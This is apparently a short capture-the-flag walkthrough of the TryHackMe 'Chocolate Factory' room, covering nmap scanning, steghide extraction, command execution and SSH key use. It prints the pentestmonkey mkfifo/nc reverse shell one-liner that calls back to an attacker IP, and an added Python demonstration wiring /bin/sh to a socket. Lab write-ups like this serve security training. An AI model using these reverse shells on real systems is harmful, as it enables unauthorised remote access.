Chocolate Factory | THM

Initial enumeration with an nmap service/version scan plus the default scripts:

nmap -sV -sC machine_IP

Downloading the image from the FTP server with the get command (the first argument is the remote file, the second the local path to save it to):

get file_name.png /local_directory/filename.png

Extracting the data hidden in the image with steghide. It prompts for a passphrase; pass -p '' if the passphrase is empty:

steghide extract -sf file_name

The extracted data turned out to be a copy of the /etc/passwd file.
From here we can see that command execution can be performed, which is what the next step uses to get a shell.

The following reverse shell one-liner is taken from pentestmonkey's reverse shell cheat sheet. Replace 10.0.0.1 and 1234 with the attacking host's IP address and the port on which a listener (for example nc -lvnp 1234) is already waiting:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
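To make clear what the one-liner actually does, here is an added example (not part of the original write-up or the room) that plays both ends of a reverse shell on a single machine: the "attacker" side is a listener on a loopback port (the role nc -lvnp plays in the room), and the "victim" side connects out and wires /bin/sh's stdin, stdout and stderr to that connection, which is exactly what the mkfifo/nc pipeline achieves with a FIFO and two pipes. It assumes a Linux or macOS host with /bin/sh and Python 3; the host, port and commands are placeholders chosen for the demonstration.

```python
# Added example: how a reverse shell works, demonstrated end to end on one
# machine. The "attacker" side is a listener (the job nc -lvnp does in the room),
# the "victim" side dials out and wires /bin/sh's stdin/stdout/stderr to the
# socket, which is what the pentestmonkey mkfifo/nc one-liner achieves with a
# FIFO and two pipes. Assumes Linux/macOS with /bin/sh and Python 3.
import socket
import subprocess


def start_listener(host="127.0.0.1"):
    """Attacker side: bind an ephemeral port and wait for the victim to call back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))          # port 0 = let the OS pick a free port
    srv.listen(1)
    return srv


def victim_connect(host, port):
    """Victim side: connect back and hand the socket to a shell.

    Equivalent to `cat /tmp/f | /bin/sh -i 2>&1 | nc HOST PORT > /tmp/f`:
    the shell reads commands from the connection (stdin) and both stdout
    and stderr (2>&1) flow back to the attacker over the same connection.
    """
    s = socket.create_connection((host, port))
    proc = subprocess.Popen(
        ["/bin/sh"],
        stdin=s.fileno(),
        stdout=s.fileno(),
        stderr=subprocess.STDOUT,
    )
    # The child holds its own copies of the descriptor after dup2, so the
    # parent's reference can go; the connection stays open until sh exits.
    s.close()
    return proc


def run_demo(commands, timeout=10):
    """Drive the whole exchange locally and return what the attacker receives."""
    srv = start_listener()
    port = srv.getsockname()[1]
    proc = victim_connect("127.0.0.1", port)
    conn, _ = srv.accept()
    try:
        # The attacker "types" commands; "exit" ends the shell, which closes
        # the last descriptor on the socket and so ends the connection.
        conn.sendall(("\n".join(commands) + "\nexit\n").encode())
        conn.settimeout(timeout)
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:       # EOF: sh exited and the victim side closed
                break
            chunks.append(data)
    finally:
        conn.close()
        srv.close()
        proc.wait(timeout=timeout)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    # Constructed demo commands: one succeeds (stdout), one fails (stderr),
    # and both come back over the same connection because of 2>&1.
    print(run_demo(["id", "echo reverse-shell-$((6*7))", "ls /nonexistent_path_for_demo"]))
```

In the room the two halves run on different hosts: the listener is started on the attacking machine first, and the one-liner is what gets typed into the command-execution point on the target. The rm /tmp/f at the start of the one-liner simply clears a FIFO left over from an earlier attempt so that mkfifo does not fail.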

We got hold of the id_rsa key. Before using it with ssh -i, set its permissions with chmod 600 id_rsa, since ssh refuses private keys that are readable by other users.
Finally, executing root.py.
